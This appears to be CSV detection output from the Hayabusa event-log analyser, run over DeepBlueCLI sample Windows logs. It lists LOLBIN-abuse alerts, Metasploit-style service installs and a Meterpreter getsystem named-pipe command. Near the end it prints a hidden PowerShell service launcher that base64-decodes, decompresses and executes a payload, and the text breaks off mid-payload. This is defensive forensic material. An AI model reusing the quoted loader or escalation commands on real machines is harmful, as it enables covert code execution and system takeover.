C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xee8 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:44:08.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\uacrfkow.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | 
PID: 0x7d8 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:44:09.484 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x944 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 02:44:09.499 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe70 | User: IEUser | LID: 0x970a9",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 03:07:37.968 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 03:46:20.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,InitAccess | 
Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 03:57:20.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc80 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 03:57:21.015 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8f4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 04:05:34.164 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x92c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 04:05:34.195 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 04:55:29.037 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: 
C:\Windows\System32\gpscript.exe | PID: 0xd20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 04:55:30.037 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160818195530.log C:\Windows\Logs\CBS\CbsPersist_20160818195530.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 04:55:33.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:55:49.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 04:55:51.989 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x71c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 04:55:52.176 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 04:55:52.364 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 04:55:53.255 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xbc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 04:55:57.149 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xa5c | User: IEUser | LID: 0x1ceaf",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 04:55:57.542 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xa7c | User: IEUser | LID: 0x1ceaf,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 04:55:59.915 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 04:56:34.967 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 04:56:34.999 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdd0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 04:58:48.497 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 04:58:48.512 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{A4B07E49-6567-4FB8-8D39-01920E3B2357} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd14 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:59:33.224 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:00:43.879 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfc0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:00:43.910 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:03:18.175 
+09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:03:18.175 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:03:18.175 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:03:18.175 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: XCKcRAHmHLAkajXO | Path: 
%SYSTEMROOT%\kAtEspLd.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:04:19.379 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:08:53.832 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x274 | User: IEUser | LID: 0x1d069",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: mHPhVsrnnbYuDOWj | Path: 
%SYSTEMROOT%\AFDvMJdc.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe | Account: LocalSystem | Start Type: demand 
start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:16:40.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc94 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:16:40.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:16:40.605 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xad4 | User: IEUser | LID: 0x1ceaf",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:24:48.043 
+09:00,IE10Win7,7045,info,Persis,Service Installed,Name: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR